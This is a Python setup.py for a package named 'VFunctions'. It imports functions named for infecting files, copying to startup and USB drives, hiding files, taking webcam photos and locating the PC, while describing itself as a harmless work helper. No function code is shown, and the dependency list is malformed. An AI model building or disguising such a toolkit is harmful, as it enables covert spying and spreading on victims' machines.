from VFunctions import cts
from VFunctions import ctl
from VFunctions import ctus
from VFunctions import cts_r
from VFunctions import ctl_r
from VFunctions import ctus_r
from VFunctions import Paste_In_To_Startup
from VFunctions import Rick_Roll
from VFunctions import Web_Cam_Photo
from VFunctions import Log_IN_To_Email
from VFunctions import SWCPE
from VFunctions import SPCLE
from VFunctions import Log_Out_Of_Email
from VFunctions import Infect_Files
from VFunctions import You_are_an_idiot
from VFunctions import Chage_Background
from VFunctions import Get_Ip
from VFunctions import Pc_location
from VFunctions import Hide_file
from VFunctions import Paste_To_USB


from setuptools import setup, find_packages
import codecs
import os


VERSION = '0.0.1'
DESCRIPTION = 'Some things that will make my work easier'

# Setting up
setup(
    name="VFunctions",
    version=VERSION,
    author="sonkraft1",
    author_email="<skraft2727@gmail.com>",
    description=DESCRIPTION,
    packages=find_packages(),
    install_requires=['shutil', 'os', 'tkinter', 'webbrowser', 'pygame' , 'pygame.camera' ,'selenium', 'webdriver_manager.chrome', 'time', 'smtplib', 'email.message', 'imghdr', 'playsound', 'google_drive_downloader', 'ctypes', 'socket', 'glob', 'geocoder', 'datetime', 'pathlib'],
    keywords=['python', 'video', 'stream', 'video stream', 'camera stream', 'sockets'],
    classifiers=[]
)